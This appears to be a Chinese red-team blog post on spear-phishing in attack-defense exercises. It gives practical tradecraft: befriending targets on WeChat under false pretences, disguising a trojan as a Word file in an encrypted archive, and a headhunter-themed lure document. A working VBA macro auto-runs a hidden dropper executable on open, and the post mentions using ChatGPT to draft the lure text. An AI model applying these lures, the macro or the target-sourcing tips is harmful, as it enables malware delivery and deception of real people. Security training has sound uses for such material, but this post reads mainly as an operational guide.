鱼叉式钓鱼

鱼叉式钓鱼

在国内,相比邮件,各个企业单位更偏向于使用即时通信软件进行工作交流。在进行钓鱼活动中,更偏向使用IM进行钓鱼,一是可以跟对方聊一聊天,让对方更信任我们所扮演的角色,二是更容易获得对方有没有点击木马的反馈。

scareing 大佬的话讲钓鱼就是

加微信,聊天,发马

如果钓不上来只有两个原因:

  1. 聊天不够真诚
  2. 加的人不够多

钓鱼案例

案例一

这个案例非常简单,在一次地级市攻防中对一个小型企业进行钓鱼。我直接通过天眼查加了他们老板的微信,假装进行设备采购,直接发马。毕竟这种老板大概率是自己去谈业务,有业务找上来没有不看的道理。

木马准备上也非常简单。给木马加了一个word的图标进行伪装,木马文件直接起了一个超长的名字.exe,然后放到压缩包中加密发送。为了方便抓取密码,还调用了UAC。在木马执行后,显示一个错误弹窗,用来让对方反馈。(现在想想应该弄一个真的word文档给对面看,不然太容易引起对方怀疑了)

案例二

在这个案例中是通过office宏进行钓鱼,原因就是木马需要带参数才能执行,所以写了一个宏去执行木马,而恰好被钓鱼的人电脑上又没有开杀软,所以我不清楚的这种带宏的office文件是否会引起杀软的告警。

首先通过抖音找到了一个目标单位里的人,感觉爱秀自己工作,秀自己私生活的人对网络钓鱼都没有什么防备心。然后我伪装成一名猎头做了一个非常精致的钓鱼word。在word中,我写了一个真实的岗位招聘需求(网上找的),为了引导对方点击启用内容,又写了一个文档声明(用ChatGPT快速出了差不多的东西)。在这里我遇到了第一个问题就是 要在执行宏后将招聘正文显示出来,我解决不了让引导内容与招聘正文都以文字的形式保存。最后没办法只能用一个等大小的截图解决,并在宏代码中执行隐藏图片。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Sub Document_Open()
    Replace 
End Sub 

Sub AutoOpen() 
    Replace 
End Sub 

Sub Replace() 
    Dim str As String 
    str = "cmd.exe /c .\__MACOSX\defender.exe ""password""" 
    Shell str, vbHide 
    Hide 
End Sub 

Sub Hide() 
    With ActiveWindow.View 
        If .ShowPicturePlaceHolders = False Or .ShowDrawings = True Then 
            .ShowPicturePlaceHolders = True 
            .ShowDrawings = False 
        End If 
    End With 
End Sub 

Sub ShowAllPictures() 
    Dim nResponse As Integer 
    nResponse = MsgBox("Do you want to show all pictures?", 4, "display pictures") 
    If nResponse = 6 Then 
        With ActiveWindow.View 
            If .ShowPicturePlaceHolders = True Or .ShowDrawings = False Then 
                .ShowPicturePlaceHolders = False 
                .ShowDrawings = True 
            Else 
                MsgBox ("No picture is Hidden.") 
            End If 
        End With 
    End If 
End Sub

因为做戏做了全套,所以对方直到安全人员找到他才知道被钓鱼了(我们搞得动静太大了😂)。但这种钓鱼也不是完美。相比来说,发送exe更稳定一些,因为有些人使用WPS,而WPS我们遇到的一个人是无法运行宏的。后来简单看了一个个人版的WPS

  • 登录会员用户 —— 有宏功能
  • 登录非会员用户 —— 不知道有没有宏功能,猜测没有
  • 未登录 —— 无宏功能

总结一下

从哪里找钓鱼目标?

  1. 天眼查
  2. 微信公众号
  3. 抖音、小红书
  4. 网站底部联系方式

在木马准备方面,首先免杀是必要的,其次有能力的话,尽量做戏做全套的吧,被钓了这么多年的鱼,大家对不能正常打开的文件都会有疑心。

写在最后

在最快乐的一次大型活动中,大佬边撩妹边日站。大佬还偷偷给妹妹开小灶,我偷学到最有价值的内容就是 截图与查看截图 (🤪🤪🤪🤪🤪🤪🤪🤪🤪🤪🤪)
screenshot